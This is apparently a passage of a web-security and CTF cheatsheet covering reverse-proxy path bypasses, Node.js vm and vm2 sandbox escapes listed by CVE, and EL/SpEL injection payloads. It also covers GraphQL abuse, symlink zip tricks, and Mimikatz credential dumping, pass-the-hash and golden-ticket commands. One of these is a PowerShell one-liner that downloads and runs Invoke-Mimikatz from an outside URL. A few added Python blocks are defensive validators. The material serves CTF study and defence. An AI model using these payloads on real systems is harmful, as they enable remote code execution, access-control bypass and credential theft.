- The original Unicode code point is U+560A
- raw bytes: 0x56, 0x0A
- MySQL utf8 v.s. utf8mb4
- MySQL's utf8 encoding only supports 3 bytes
- Inserting a 4-byte utf8mb4 character into a utf8 column gets truncated in non-strict mode
- CVE-2015-3438 WordPress Cross-Site Scripting Vulnerability
- Proxy related
- Path parameters
- Tomcat & Jetty: /path;param/abcd => /path/abcd
- WebLogic & WildFly: /path;param/abcd => /path
- Nginx + Tomcat
..;
- Scenario: Nginx -> Tomcat, Nginx denies /manager
/docs/..;/manager/html
- Nginx: /docs/..;/manager/html
- Tomcat: /manager/html
- Scenario: Nginx -> Tomcat, Nginx denies /console/ (location ~* /console/)
/..;/console;/flag
- Nginx: /..;/console;/flag
- Tomcat: /console/flag
- Nginx + Apache
- Scenario: Nginx -> Apache, Nginx denies /admin, proxy_pass http://apache (no trailing slash, so the raw request is forwarded to the backend)
/admin//../flag
- Nginx: /flag
- Apache: /admin/flag
- Nginx + WebLogic
- Scenario: Nginx -> WebLogic, Nginx denies /console, proxy_pass http://weblogic;
/#/../console
- Nginx: /
- WebLogic: /console
- Nginx + Gunicorn
- Bypassing blacklist rules
- Nginx denies /admin
/admin/key\x09HTTP/1.1/../../../
- Nginx: /
- Gunicorn: /admin/key
- Fixed in newer Nginx versions
- Example:
- Nginx + Swift
- Example: Line CTF 2024 - zipviewer-version-clown
- Nginx is case sensitive, Swift is not
- Rate limit bypass
- Haproxy + Caddy
- Haproxy: keep-alive + CONNECT + a 2xx status puts it into tunnel mode, where no rules are applied
- Caddy: matches on the normalized path, but what it sends out is not the normalized path
- Example: SecurityFest CTF 2022 - tunnelvision
- ref: https://github.com/GrrrDog/weird_proxies/tree/master
- Gunicorn SCRIPT_NAME
- SCRIPT_NAME can change the base path
- With SCRIPT_NAME=test, /a/b/test/flag => /flag
- gunicorn's SCRIPT_NAME can be set through an HTTP header: SCRIPT_NAME: a
- If there is a proxy in front, e.g. Nginx, underscores_in_headers must be enabled to allow _ in header names
- Example: CSAW 2021 - gatekeeping
- Nginx internal bypass
X-Accel-Redirect
- Document
- Example:
- Olympic CTF 2014 - CURLing
- MidnightSun CTF 2019 - bigspin
- PBCTF 2023 - Makima
- Nginx path traversal
- Common when Nginx acts as a reverse proxy
location /files { alias /home/ }
- Because /files has no trailing / while /home/ does
- /files../ reaches the parent directory
- Nginx add_header
- By default add_header only sets the header when the response is 200, 201, 204, 206, 301, 302, 303, 304, 307, or 308
- e.g. Codegate 2020 - CSP
- Nginx $uri CRLF Injection
- $uri is the decoded request path; it may contain newlines, which can lead to CRLF Injection
- Use $request_uri instead
- Example: VolgaCTF 2021 - Static Site
proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
- CRLF Injection overwrites the Host header sent to the S3 bucket, controlling the response content for XSS
- JavaScript case-conversion quirks
"ı".toUpperCase() == 'I'
"ſ".toUpperCase() == 'S'
"K".toLowerCase() == 'k'
- Reference
- JavaScript replace quirks
- $ can be used in the replacement string
> "123456".replace("34", "xx")
'12xx56'
> "123456".replace("34", "$`")
'121256'
> "123456".replace("34", "$&")
'123456'
> "123456".replace("34", "$'")
'125656'
> "123456".replace("34", "$$")
'12$56'
- Example
- JavaScript Proxy
- doc
- Try to get the flag protected by a Proxy:
var p = new Proxy({flag: window.flag || 'flag'}, { get: () => 'nope' })
- Solution:
Object.getOwnPropertyDescriptor(p, 'flag')
- Example
- Node.js path traversal
- CVE-2017-14849
- Affected: version 8.5.0
/static/../../../foo/../../../../etc/passwd
- Node.js vm escape
const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('whoami').toString()
- CONFidence CTF 2020 - TempleJS
- Only allows /^[a-zA-Z0-9 ${}`]+$/g
Function`a${`return constructor`}{constructor}` `${constructor}` `return flag` ``
- Node.js vm2 escape
- CVE-2019-10761
- vm2 <= 3.6.10
- CVE-2021-23449
- vm2 <= 3.9.4
let res = import('./foo.js') res.toString.constructor("return this")().process.mainModule.require("child_process").execSync("whoami").toString();
- CVE-2023-29199
- vm2 <= 3.9.15
aVM2_INTERNAL_TMPNAME = {}; function stack() { new Error().stack; stack(); } try { stack(); } catch (a$tmpname) { a$tmpname.constructor.constructor('return process')().mainModule .require('child_process') .execSync('echo "flag is here" > flag'); }
- CVE-2023-30547
- vm2 <= 3.9.16
err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); }
- CVE-2023-32314
- vm2 <= 3.9.17
const err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("whoami").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; }
- CVE-2023-37466
- vm2 <= 3.9.19
async function fn() { (function stack() { new Error().stack; stack(); })(); } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch 123'); } ) } } }; p.then();
- vm2 is officially deprecated
-
Apache Tomcat Session manipulation vulnerability
- Default session example page: `/examples/servlets/servlet/SessionExample`
  - Lets you write attributes directly into the Session
polyglot image + .htaccess
- The XBM format is defined in `exif_imagetype()`, and an XBM header also conforms to the `.htaccess` format
- Insomnihack CTF
  ```
  #define gg_width 1337
  #define gg_height 1337
  AddType application/x-httpd-php .asp
  ```
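Why the file above passes an image check and still works as `.htaccess`: XBM is a text format whose header is a C-style `#define <name>_width <n>` line, and Apache ignores lines it does not understand. The validator below is an added example, not PHP's code and not from the CTF; `looks_like_xbm` is a simplified model of the XBM test (an assumption), the directive list is illustrative, and `upload_allowed` shows the checks that close the gap.

```python
import re

# Simplified model of the XBM test in exif_imagetype(): an XBM file starts with
# a text line "#define <name>_width <n>". An assumption for illustration, not
# PHP's implementation.
_XBM_HEADER = re.compile(rb"\A\s*#define\s+\w+_width\s+\d+")

# Apache directives that make an upload directory executable. Illustrative, not exhaustive.
_APACHE_DIRECTIVE = re.compile(
    rb"^\s*(AddType|AddHandler|SetHandler|php_value|php_flag|RewriteRule)\b",
    re.IGNORECASE | re.MULTILINE)

# Binary image signatures the hardened validator accepts.
_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
          b"GIF87a": "gif", b"GIF89a": "gif"}


def looks_like_xbm(data: bytes) -> bool:
    """Would a magic-type check classify these bytes as an XBM image?"""
    return _XBM_HEADER.match(data) is not None


def naive_is_image(data: bytes) -> bool:
    """Mimics trusting exif_imagetype() alone: any recognised type passes, XBM included."""
    return looks_like_xbm(data) or any(data.startswith(m) for m in _MAGIC)


def upload_allowed(filename: str, data: bytes) -> bool:
    """Hardened check: binary formats only, extension must match, no dotfiles, no directives."""
    base = filename.rsplit("/", 1)[-1]
    if base.startswith(".") or "." not in base:
        return False                        # .htaccess, .user.ini, extensionless names
    ext = base.rsplit(".", 1)[-1].lower()
    kind = next((k for m, k in _MAGIC.items() if data.startswith(m)), None)
    if kind is None or kind != ("jpeg" if ext == "jpg" else ext):
        return False                        # text-based (XBM) or mismatched content type
    return _APACHE_DIRECTIVE.search(data) is None


# The Insomnihack polyglot from the cheatsheet: a valid XBM header that is also a valid .htaccess.
POLYGLOT = (b"#define gg_width 1337\n#define gg_height 1337\n"
            b"AddType application/x-httpd-php .asp\n")
```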
AutoBinding / Mass Assignment
- Mass_Assignment_Cheat_Sheet
- Spring MVC `@ModelAttribute`
  - Binds the parameters sent by the client (GET/POST) to the specified object, and automatically adds that object to the ModelMap
  - Example
    ```java
    @RequestMapping(value = "/home", method = RequestMethod.GET)
    public String home(@ModelAttribute User user, Model model) {
        if (showSecret) {
            model.addAttribute("firstSecret", firstSecret);
        }
        return "home";
    }
    ```
  - Example 2:
  - Example 3: VolgaCTF 2019 - shop
EL Injection / SpEL Injection
- EL = Expression Language, SpEL = Spring Expression Language
- Some payloads
  ```
  ${"a".toString()}
  ${"".getClass()}
  ${applicationScope}
  ${sessionScope.toString()}
  ${pageContext.request.getSession().setAttribute("admin", true)}
  ${T(java.lang.Runtime).getRuntime().exec("<my command here>")}
  ${Class.forName('java.lang.Runtime').getRuntime().invoke(null).exec(<RCE>).getInputStream().read()}
  ${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
  ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
  ```
- Example
GraphQL
- Information disclosure
  - Basic queries
    - List the existing types:
      ```
      { __schema { types { name } } }
      {__schema{types{name,fields{name}}}}
      ```
    - List all fields of one type:
      ```
      { __type (name: "Query") { name fields { name type { name kind ofType { name kind } } } } }
      {__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
      ```
    - Find all types, their fields, their arguments and the argument types
    - Look for sensitive fields such as password, email, token, session, secretkey, ...
    - Dump the schema through introspection:
      ```
      fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
      ```
  - Suggestion
    - When an unknown keyword is entered, the GraphQL backend suggests the correct keyword
      ```
      "message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
      ```
    - Brute-force it with a dictionary file
  - Error messages
    - Useful information can be obtained from error messages
      ```
      {__schema}
      {}
      {somerandomshit}
      ```
  - Graphene-Django DEBUG
    - Append `__debug` to get detailed information, e.g. the executed SQL statements
- Batch query
  - Array-based queries send several requests at once
  - Apollo GraphQL does not enable array batching by default
  - Common scenarios: password brute-force, rate limit bypass, DoS
    ```
    [{ query: 'query { book(id: 1) { __typename } }' },{ query: 'query { book(id: 1) { __typename } }' }]
    ```
  - When JSON-list-based batching is not available, try query-name-based batching
    ```
    {"query": "query { kaibro: Query { meow } kaibro1: Query { meow } }"}
    ```
  - Example:
- CSRF
  - GET-based
    ```
    /graphql?query=query+%7B+a+%7D
    ```
  - POST-based
    - Still executes when the content-type is changed to `x-www-form-urlencoded` - Example: Express-GraphQL, Portswigger's lab
- Query Depth Attack
  - Without a depth limit this easily leads to DoS
  - Example:
    ```
    query { books { title author { title books { title author { ... } } } } }
    ```
- Alias overloading
  - Example:
    ```
    query { book(id: 1) { __typename alias: __typename alias2: __typename alias3: __typename alias4: __typename } }
    ```
- Tool
  - graphw00f (fingerprinting)
  - graphquail
  - GraphQLmap
  - ...
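The three resource-abuse patterns above (nesting depth, alias overloading and array batching) can all be measured before a request reaches a resolver. The scanner below is an added example, not code from the cheatsheet or from any GraphQL server: a dependency-free brace/colon counter rather than a full GraphQL parser, with illustrative limits in `within_limits` that a real deployment would tune.

```python
import json


def _scan(query: str):
    """Return (max selection-set depth, alias count) for one query string."""
    # '{' opens a selection set; a ':' outside parentheses but inside a
    # selection set introduces an alias (colons inside '(...)' are arguments).
    depth = max_depth = parens = aliases = 0
    in_string = False
    i = 0
    while i < len(query):
        c = query[i]
        if in_string:                      # skip string literals entirely
            if c == "\\":
                i += 1
            elif c == '"':
                in_string = False
        elif c == '"':
            in_string = True
        elif c == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif c == "}":
            depth -= 1
        elif c == "(":
            parens += 1
        elif c == ")":
            parens -= 1
        elif c == ":" and parens == 0 and depth > 0:
            aliases += 1
        i += 1
    return max_depth, aliases


def analyze_graphql(body: str) -> dict:
    """Summarise a request body: JSON object, JSON array (batch) or bare query."""
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        payload = {"query": body}          # the ?query=... GET form
    ops = payload if isinstance(payload, list) else [payload]
    results = [_scan(op.get("query", "")) for op in ops if isinstance(op, dict)] or [(0, 0)]
    return {"batch": len(ops),
            "depth": max(d for d, _ in results),
            "aliases": max(a for _, a in results)}


def within_limits(body: str, max_depth=5, max_aliases=10, max_batch=1) -> bool:
    """Illustrative policy (constructed defaults): reject deep, alias-heavy or batched bodies."""
    r = analyze_graphql(body)
    return r["depth"] <= max_depth and r["aliases"] <= max_aliases and r["batch"] <= max_batch
```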
HTTP2 Push
- The server pushes resources back on its own (e.g. CSS/JS files)
- e.g. ALLES CTF 2020 - Push
- Chrome Net Export tool
Symlink
```
ln -s ../../../../../../etc/passwd kaibro.link
zip --symlink bad.zip kaibro.link
```
curl trick
```
curl 'fi[k-m]e:///etc/passwd'
curl '{asd,bb}'
```
- Example: N1CTF 2021 - Funny_web
tcpdump
- `-i`: specify the interface; if omitted, all interfaces are monitored
- `-s`: only 96 bytes per packet are captured by default; pass a larger value with `-s`
- `-w`: specify the output file
- `host`: specify the host (IP or domain)
- `dst`, `src`: destination or source
- `port`: specify the port
- `tcp`, `udp`, `icmp`: specify the protocol
- Examples
  - Source 192.168.1.34 and destination port 80
    ```
    tcpdump -i eth0 src 192.168.1.34 and dst port 80
    ```
  - Source 192.168.1.34 and destination port 22 or 3389
    ```
    tcpdump -i eth0 'src 192.168.1.34 and (dst port 22 or 3389)'
    ```
  - Save to a file for later analysis in Wireshark
    ```
    tcpdump -i eth0 src kaibro.tw -w file.cap
    ```
Tool & Online Website
Information gathering
Hash Crack
Others
- php eval
- https://github.com/denny0223/scrabble
  - git
- https://github.com/lijiejie/ds_store_exp
  - .DS_Store
- https://github.com/kost/dvcs-ripper
  - git / svn / hg / cvs ...
- unicode converter
- PHP obfuscation / encryption
- https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt
  - XSS Payloads
- DNSLog
- DNS rebinding
  - rebind.network
    ```
    # but it still works
    A.192.168.1.1.forever.rebind.network
    # alternate between localhost and 10.0.0.1 forever
    A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network
    # first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever.
    A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network
    # respond with 52.23.194.42 the first time, then whatever `whonow --default-address`
    # is set to forever after that (default: 127.0.0.1)
    A.52.23.194.42.1time.rebind.network
    ```
  - rbndr.us
    ```
    36573657.7f000001.rbndr.us
    ```
  - Example
- https://r12a.github.io/apps/encodings/
  - Encoding converter
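DNS rebinding works because the same name resolves to a public address on the first lookup and to an internal one afterwards (the `1time` / `forever` pattern in the rebind.network names above). The defence on the fetching side is to resolve once, validate the answer and pin it for the rest of the request. The class below is an added example written for this section, not code from whonow, rebind.network or rbndr.us; `lookup` is injectable so the rebinding sequence can be replayed offline with constructed answers, and `target.example` is a placeholder hostname.

```python
import ipaddress
import socket


def is_public(ip) -> bool:
    """True only for globally routable unicast addresses."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


class PinnedResolver:
    """Resolve each hostname once, validate the answer, reuse it afterwards.

    Later lookups of the same name never touch DNS again, so a record that
    flips from a public address to 127.0.0.1 cannot redirect a request that
    is already in progress.
    """

    def __init__(self, lookup=socket.gethostbyname):
        self._lookup = lookup      # injectable so the check runs offline in tests
        self._pinned = {}

    def resolve(self, hostname: str) -> str:
        if hostname not in self._pinned:
            ip = ipaddress.ip_address(self._lookup(hostname))
            if not is_public(ip):
                raise ValueError(f"{hostname} resolved to non-public address {ip}")
            self._pinned[hostname] = str(ip)
        return self._pinned[hostname]


# Constructed answer sequence mirroring A.52.23.194.42.1time.rebind.network:
# a public address on the first answer, loopback on every later one.
REBIND_ANSWERS = ["52.23.194.42", "127.0.0.1", "127.0.0.1"]


def replay_rebinding(answers=REBIND_ANSWERS):
    """Return (first pinned answer, second pinned answer, what a naive re-resolve sees)."""
    it = iter(answers)
    pinned = PinnedResolver(lookup=lambda _name: next(it))
    first = pinned.resolve("target.example")
    second = pinned.resolve("target.example")   # served from the pin, DNS not consulted
    naive_second = next(it)                       # an unpinned client would follow this
    return first, second, naive_second
```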
Mimikatz
- Dump passwords
  ```
  mimikatz.exe privilege::debug sekurlsa::logonpasswords full exit >> log.txt
  ```
  - powershell, fileless:
    ```
    powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
    ```
- Pass The Hash
  ```
  sekurlsa::pth /user:Administrator /domain:kaibro.local /ntlm:cc36cf7a8514893efccd332446158b1a
  sekurlsa::pth /user:Administrator /domain:kaibro.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
  sekurlsa::pth /user:Administrator /domain:kaibro.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
  ```
- TGT
  ```
  kerberos::tgt
  ```
  (Displays information about the TGT of the current session)
- List / Export Kerberos tickets of all sessions
  ```
  sekurlsa::tickets /export
  ```
- Pass The Ticket
  ```
  kerberos::ptt Administrator@krbtgt-KAIBRO.LOCAL.kirbi
  ```
- Golden
  - generate the TGS with NTLM:
    ```
    kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
    ```
  - generate the TGS with AES 128 key:
    ```
    kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
    ```
  - generate the TGS with AES 256 key:
    ```
    kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
    ```
- Purge
  ```
  kerberos::purge
  ```
  (Purges all tickets of the current session)
WASM
Contributing
Welcome to open Pull Request
OR